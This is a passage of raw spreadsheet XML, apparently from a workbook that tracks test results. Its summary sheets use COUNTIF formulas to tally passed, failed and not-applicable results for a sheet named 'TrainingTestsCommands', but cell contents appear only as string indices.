      <c r="B42" s="5" t="s">
        <v>82</v>
      </c>
      <c r="C42" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1">
      <c r="A43" s="7" t="s">
        <v>83</v>
      </c>
      <c r="B43" s="5" t="s">
        <v>84</v>
      </c>
      <c r="C43" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1">
      <c r="A44" s="7" t="s">
        <v>85</v>
      </c>
      <c r="B44" s="6" t="s">
        <v>86</v>
      </c>
      <c r="C44" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1">
      <c r="A45" s="2" t="s">
        <v>87</v>
      </c>
      <c r="B45" s="5" t="s">
        <v>15</v>
      </c>
      <c r="C45" s="5" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1">
      <c r="A46" s="2" t="s">
        <v>88</v>
      </c>
      <c r="B46" s="5" t="s">
        <v>89</v>
      </c>
      <c r="C46" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1">
      <c r="A47" s="2" t="s">
        <v>90</v>
      </c>
      <c r="B47" s="5" t="s">
        <v>91</v>
      </c>
      <c r="C47" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1">
      <c r="A48" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B48" s="5" t="s">
        <v>93</v>
      </c>
      <c r="C48" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1">
      <c r="A49" s="2" t="s">
        <v>94</v>
      </c>
      <c r="B49" s="5" t="s">
        <v>95</v>
      </c>
      <c r="C49" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1">
      <c r="A50" s="5" t="s">
        <v>96</v>
      </c>
      <c r="B50" s="5" t="s">
        <v>97</v>
      </c>
      <c r="C50" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1">
      <c r="A51" s="5" t="s">
        <v>98</v>
      </c>
      <c r="B51" s="5" t="s">
        <v>99</v>
      </c>
      <c r="C51" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1">
      <c r="A52" s="5" t="s">
        <v>100</v>
      </c>
      <c r="B52" s="5" t="s">
        <v>101</v>
      </c>
      <c r="C52" s="5" t="s">
        <v>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24.13"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="8"/>
      <c r="B1" s="8" t="s">
        <v>102</v>
      </c>
      <c r="C1" s="9"/>
    </row>
    <row r="2">
      <c r="A2" s="10" t="s">
        <v>103</v>
      </c>
      <c r="B2" s="11"/>
      <c r="C2" s="12">
        <f>COUNTIF(TrainingTestsCommands!C2:C50,"Failed")</f>
        <v>0</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="13" t="s">
        <v>104</v>
      </c>
      <c r="B3" s="14"/>
      <c r="C3" s="15">
        <f>COUNTIF(TrainingTestsCommands!C2:C50,"Passed")</f>
        <v>44</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="13" t="s">
        <v>105</v>
      </c>
      <c r="B4" s="14"/>
      <c r="C4" s="15">
        <f>COUNTIF(TrainingTestsCommands!C2:C50,"N/A")</f>
        <v>4</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="10" t="s">
        <v>106</v>
      </c>
      <c r="B5" s="11"/>
      <c r="C5" s="12">
        <f>COUNTA(TrainingTestsCommands!C2:C50)</f>
        <v>48</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="13" t="s">
        <v>107</v>
      </c>
      <c r="B6" s="14"/>
      <c r="C6" s="16">
        <f>C3/C5</f>
        <v>0.9166666667</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="10" t="s">
        <v>108</v>
      </c>
      <c r="B7" s="11" t="s">
        <v>109</v>
      </c>
      <c r="C7" s="17">
        <f>(C2+C3)/C5</f>
        <v>0.9166666667</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="13" t="s">
        <v>110</v>
      </c>
      <c r="B8" s="14" t="s">
        <v>111</v>
      </c>
      <c r="C8" s="16">
        <f>C6/C7</f>
        <v>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19.13"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="18" t="s">
        <v>112</v>
      </c>
      <c r="B1" s="19"/>
    </row>
    <row r="2">
      <c r="A2" s="20" t="s">
        <v>103</v>
      </c>
      <c r="B2" s="21">
        <v>0.0</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="22" t="s">
        <v>104</v>
      </c>
      <c r="B3" s="23">
        <v>10.0</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="22" t="s">
        <v>105</v>
      </c>
      <c r="B4" s="24">
        <v>1.0</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="20" t="s">
        <v>106</v>
      </c>
      <c r="B5" s="25">
        <v>11.0</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="22" t="s">
        <v>107</v>
      </c>
      <c r="B6" s="26">
        <f>B3/B5</f>
        <v>0.9090909091</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:B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2021-08-16T14:45:33Z</dcterms:created>
  <dc:creator>Petrut Jianu</dc:creator>
</cp:coreProperties>
</file>